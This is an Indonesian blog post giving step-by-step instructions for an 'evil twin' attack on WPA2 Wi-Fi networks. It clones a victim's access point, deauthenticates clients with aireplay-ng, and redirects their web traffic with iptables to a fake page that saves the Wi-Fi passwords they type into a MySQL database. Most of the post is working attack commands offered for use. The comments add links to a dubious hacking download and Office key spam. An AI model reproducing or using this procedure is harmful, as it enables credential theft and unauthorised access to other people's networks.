• INFO DAFTAR CUG
  • WA:085200000285
  • PIN: D703CC94

cara hack wpa2 dengan kloning akses point ( wifi palsu ) tanpa wordlist

 

Advertisement
Solusi Nelpon SMS Paket Internet Telkomsel Murah - KLIK DISINI

menjebol, membobol, menghack, serta apa pun namanya itu yang bertujuan untuk mendapatkan password wifi yang diproteksi sebenarnya adalah tindakan yang selayaknya tidak dilakukan, tapi berhubung ilmu pengetahuan banyak bergentayangan di internet, di bang google
dan lain sebagainya. memicu diri untuk mendapatkan akses internet tersebut. tapi banyak kendala yang menghalangi untuk mewujudkan
keinginan tersebut. akhirnya menjebol wifi (hospot) adalah JALAN TErAKHIR,
berdasarkan pengalaman admin, seteah menjebol wifi yang diproteksi dengan WEP hanya butuh waktu 5 menit untuk mendapatkan password. tapi ketika wifi diprotkesi dengan WPA2. susahnya minta ampun untuk menjebolnya. jangankan mendapatkan passwordnya yang kebetulan ada dalam wordlist, mendapatkan handshakenya ja lumayan susah saya dapatkan. belum lagi keberuntungan password tercantum atau tidak dalam wordlist, memang sih ada metode jhon rifer yang tidak butuhkan wordlist, tapi menunggunya bisa berhari hari bahkan berminggu minggu. akhirnya setelah googling sana dan googling sini, akhirnya dapat juga cara mendapatkan password WPA2 TANPA wordlist, tanpa handshake dan tanpa aircrack-ng :D. kita cukup mengkloning wifi yang akan kita hack, sehingga saat user (victim) yang akan
masuk ke ap yang sebenarnya, kita paksa dia mengarah ke ap (akses point) kita, secara otomatis dia akan mengisi password di fak ap kita .dengan begitu kita dapat panen password wifi tanpa harus repot repot cari wordlist dan kawan seperjuangannya :D.

sudah cukup pengantarnya, sekarang kita coba berbagi pengalaman dan ilmu yang kita miliki. oyaaa..sebelumnya terima kasih kepada pemilik video tutorial " fake ap Advanced (Wifi Hacking)- The Evil Twin Attach - YouTube " dan tehnic dynamic, juga siimon dengan TP linknya, berkat mengkombinasikan semua video dan tutorial itu akhirnya setelah dua bulan mencoba coba alhamdulillah akhirnya berhasil :).

kembali ke taufiq marpaung..upssss...salah sambung..tu nama kawan awak.. (syeh kabir ra'si) :D.
back to topic !

yang perlu dipersiapkan adalah:
1. koneksi internet, untuk mengarahkan victim ke ip kita lewat fake ap yang kita buat
2. mysql dan apache untuk menjalankan ap kita dan tempat penyimpana password
3. dhcp3 untuk membuat server baru wifi palsu kita
4. file akse point palsu (fake AP) kita, bsa di download dibawah atau disini

sebelumnya saya menggunakan OS backrtrack 5 R1.

saya akan paparkan secara singkat saja, let's gooooo.....!!


langkah langkah membuat akses poin palsu (fake AP):

==============
letakkan file fake AP di /var/www
====================
tentukan wifi yang akan dikloning !

airmon-ng start wlan0
airodump-ng mon0

perhatikan nama essid dan chanel berapa !
contohnya:
essid : arminaven_wifi
channel : 1
================================

aktifkan apache2 dan mysql
==========================

buat database !
sesuaikan nama DB dan nama tabel DB dengan savekey.php !
savekey.php sudah saya sertakan dalam folder fake ap, silahkan diperiksa. berikut syntak membuat database:
buka terminal dan ketik syntak berikut !

mysql -u root -p
password standarnya "toor"

create database verizon;
use verizon;
create table content(key1 VARCHAR(64), key2 VARCHAR(64));
======

kita lakukan percobaan keshahihan database kita dengan memasukan kata "ujicoba" pada fake AP verizon kita !

isi dengan "localhost" atau ip kita di browser !
melihat ip bisa dengan mengetik "ifconfig" diterminal
==============================================

install dhcp3 !
caranya:
buka terminal dan ketik syntak berikut !

apt-get install dhcp3-server -y

untuk jaga2, bisa memback up nya dengan syntak berikut
mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup
===========================

isi dhcp3 dengan berikut !
caranya:
ketik syntak berikut, setelah terbuka isi dengan ddns dibawah.
gedit /etc/dhcp3/dhcpd.conf

nb:
file dhcpd.con sudah saya sertakan dalam folder fake ap, anda bisa copas dari sana agar tidak ada kekeliruan
==========

ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.1.255;
option routers 192.168.1.129;
option domain-name-servers 8.8.8.8;
range 192.168.1.130 192.168.1.140;
}

================

matikan interface !

airmon-ng stop mon0
airmon-ng stop wlan0
=================

buat wifi palsu !
caranya:
buka terminal dan ketik syntak berikut !

airmon-ng start wlan0 1

airbase-ng -e "arminaven_hotspot" -c 1 mon0

wifi palsu anda (fake ap) sudah mulai kelihatan di pc victim, tapi belum berfungsi, kita beranjak kelangkah selanjutnya !
====================================

lakukan flush iptables dengan syntak berikut !

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
==================================

perhatikan interface yang anda gunakan !
apakah wlan0 ? eth0 ? dan sebagainya, bisa dilihat dari "ifconfig"
lanjtukan kembali dengan syntak berikut :

iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
================================

iptables --append FORWARD --in-interface at0 -j ACCEPT
echo "1" > /proc/sys/net/ipv4/ip_forward
====================================

gunakan IP anda yang connect ke internet !
bisa dengan "ifconfig" untuk melihat ip anda yang lagi connect ke internet, jangan sampai salah !
dan selalu anda perhatikan, apakah anda conect saat airbase atau terputus, jika sudah disconnect anda harus connect kembali
dan pastikan ip anda tidak berubah, jika berubah, anda harus mengulangi lagi flush tables !

iptables --table nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.1.3:80
iptables -t nat -A POSTROUTING -j MASQUERADE
=============================================


NB:
pada --to-destination 192.168.1.3:80 merupakan ip anda tepatnya --to-destination (ip anda):80
========================================

aktifkan dhcp3 server dengan syntak berikut !

ifconfig at0 up
ifconfig at0 192.168.1.129 netmask 255.255.255.128
route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0
/etc/init.d/dhcp3-server start
==================================
untuk sementara sudah selseai semua yang kita butuhkan sekarangggggg !

paksa victim mengarah ke ap kita dan harus mengetik www.google.com di browser atau situs lain saat memperbaharui browsernya !
nb: harus dengan nama situsnya !!
dan pastikan juga fake ap kita sudah INTERNET AKSES saat diakses oleh victim

berikut cara deauth client:


aireplay-ng -0 0 -a (AP) -c (client) mon0

saat victim telah mengakses fake ap, kita tinggal panen hasilnya di database kita !

caranya:
masuk ke database lalu ketik syntak berikut !

show databases;
show tables from verizon;
select * from content;

sekian dulu, semoga bermanfaat

file faka ap ada disini. silahkan download
insya' Allah video tutorialnya akan menyusul, sekarang masih dalam tahap proses.
wassalam

DAFTAR CUG SEKARANG | KLIK DISINI

cara hack wpa2 dengan kloning akses point ( wifi palsu ) tanpa wordlist 4.5 5 Unknown menjebol, membobol, menghack, serta apa pun namanya itu yang bertujuan untuk mendapatkan password wifi yang diproteksi sebenarnya adalah t...


7 komentar:

  1. cuba yang ni cepat dan mudah

    http://27a183ce.any.gs for 32bit window
    http://262ac766.any.gs for 64bit window

    BalasHapus
  2. File fake AP Palsu passwordnya apa om..?? Thanks

    BalasHapus
  3. gak ada pake password um...
    disini dah ane tambahkan dengan videonya um
    http://arminaven.blogspot.com/2012/12/hack-wifi-wpa2-facebook-yahoomail.html

    BalasHapus
  4. terima kasih tutornya...

    BalasHapus
  5. sudah pernah saya coba tapi selalu gagal

    BalasHapus
  6. Office 2016 Keys (http://www.Office2016Keys.com)

    To buy a genuine product key, go to the site Office 2016 Keys (http://www.Office2016Keys.com) . This is definitely not like some sites which will make you worry about the purchasing safety. The payment process is confidential and guaranteed. More importantly, the product is genuine and with attractive price.

    Office 2016 Keys (http://www.Office2016Keys.com)

    BalasHapus

1.Jangan lupa koment yah kawan,untuk mempererat silaturrahim, NO CAPTCHA berkomentarnya.
2.Silahkan kawan becanda,asal dengan etika.
3.Komentar Dengan Moderasi untuk menghindari SPAMMER. Yang mau pasang Link,gunakan NAME/URL. Link LIVE otomatis terhapus
4. Yang gak punya akun maka silahkan berkomentar sebagai "Anonim"
5.Gunakan media komentar ini sebagai sarana saran, masukan serta request :)
6.Terimakasih kunjungan dan komentarnya kawan,Mohon maaf jika belum bisa berkunjung balik

J-Theme